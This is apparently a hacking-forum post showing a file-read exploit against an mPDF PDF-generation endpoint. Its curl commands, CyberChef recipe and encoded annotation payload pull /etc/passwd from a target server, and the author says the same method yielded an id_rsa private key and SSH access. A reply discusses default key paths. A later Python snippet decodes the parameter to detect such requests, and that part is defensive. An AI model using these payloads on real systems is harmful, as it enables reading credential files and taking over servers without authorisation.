
Manual/Book mPDF read any file and meta-git RCE to root

oxostore

Holla XSS !

One more mPDF, grozdniyandy, have a look, you're gonna like this.
logged in as admin


Using Burp Suite to check the request, it seems it's base64




decrypt :


using the info from GitHub



Code:
https://gchq.github.io/CyberChef/#recipe=URL_Encode(false)URL_Encode(false)To_Base64('A-Za-z0-9%2B/%3D')&input=PGFubm90YXRpb24gZmlsZT0iL2V0Yy9wYXNzd2QiIGNvbnRlbnQ9Ii9ldGMvcGFzc3dkIiBpY29uPSJHcmFwaCIgdGl0bGU9IkF0dGFjaGVkIEZpbGU6IC9ldGMvcGFzc3dkIiBwb3MteD0iMTk1IiAvPg


using CyberChef




Code:
curl http://xxxxxxxxxxx/admin/download.php -H "Cookie: PHPSESSID=dd213s23d8mg2kds8fo10hf9hib" -d "pdf=JTI1M0Nhbm5vdGF0aW9uJTI1MjBmaWxlPSUyNTIyL2V0Yy9wYXNzd2QlMjUyMiUyNTIwY29udGVudD0lMjUyMi9ldGMvcGFzc3dkJTI1MjIlMjUyMGljb249JTI1MjJHcmFwaCUyNTIyJTI1MjB0aXRsZT0lMjUyMkF0dGFjaGVkJTI1MjBGaWxlOiUyNTIwL2V0Yy9wYXNzd2QlMjUyMiUyNTIwcG9zLXg9JTI1MjIxOTUlMjUyMiUyNTIwLyUyNTNF"





Result Output: OKdAtpf213e12edyJeFWPExZ0H.pdf

Code:
curl http://xxxxxx/mpdf/tmp/OKdAtpf213e12edyJeFWPExZ0H.pdf --output passwd.pdf





CMD AGAIN






I was able to read id_rsa and get user SSH access!

Credits please if copied; never shared in other forums!

Show some love to keep this going by reaction or whatever support!

Any translation to Russian is appreciated from an experienced user!

./0x0
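
A defender-side check for the encoding shown in the post, added here as an example and not part of the original thread: it reverses the base64 plus double URL-encoding of the `pdf` parameter and flags an `<annotation>` tag that carries a `file=` attribute. The function names and the sample values are assumptions constructed for illustration.

```python
import base64
import binascii
import re
from urllib.parse import quote, unquote

# <annotation ... file=...> is the tag the post submits to attach a server file.
ANNOTATION_FILE = re.compile(r"<\s*annotation\b[^>]*\bfile\s*=", re.IGNORECASE)


def decode_pdf_param(value: str, max_rounds: int = 3) -> str:
    """Undo the post's encoding: base64, then repeated URL-decoding."""
    compact = "".join(value.split())        # line wrapping can insert spaces
    compact += "=" * (-len(compact) % 4)    # padding is often stripped in transit
    text = base64.b64decode(compact, validate=True).decode("utf-8", "replace")
    for _ in range(max_rounds):             # the post URL-encodes twice
        once = unquote(text)
        if once == text:
            break
        text = once
    return text


def classify(value: str) -> str:
    """Return 'annotation-file', 'undecodable' or 'ok' for one `pdf` value."""
    try:
        html = decode_pdf_param(value)
    except (binascii.Error, ValueError):
        return "undecodable"
    return "annotation-file" if ANNOTATION_FILE.search(html) else "ok"


def encode_like_post(html: str) -> str:
    """Constructed-sample helper: URL-encode twice, then base64."""
    return base64.b64encode(quote(quote(html)).encode()).decode()


if __name__ == "__main__":
    samples = {  # constructed request bodies, not captured traffic
        "invoice": encode_like_post("<h1>Invoice</h1><p>Total due: 10 EUR</p>"),
        "attach": encode_like_post('<annotation file="/etc/passwd" content="x" />'),
        "garbage": "!!!not-base64!!!",
    }
    for name, value in samples.items():
        print(f"{name:8} {classify(value)}")
```

The same check can run in a WAF rule or in the download handler itself, rejecting the request before the HTML reaches mPDF.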



 
But the SSH server has only the pub key, how did you obtain SSH access without the private key?
Reading /etc/passwd will show the user path, for example, and if there is a key it will be in this default path: /home/user/.ssh/rsa_id
 

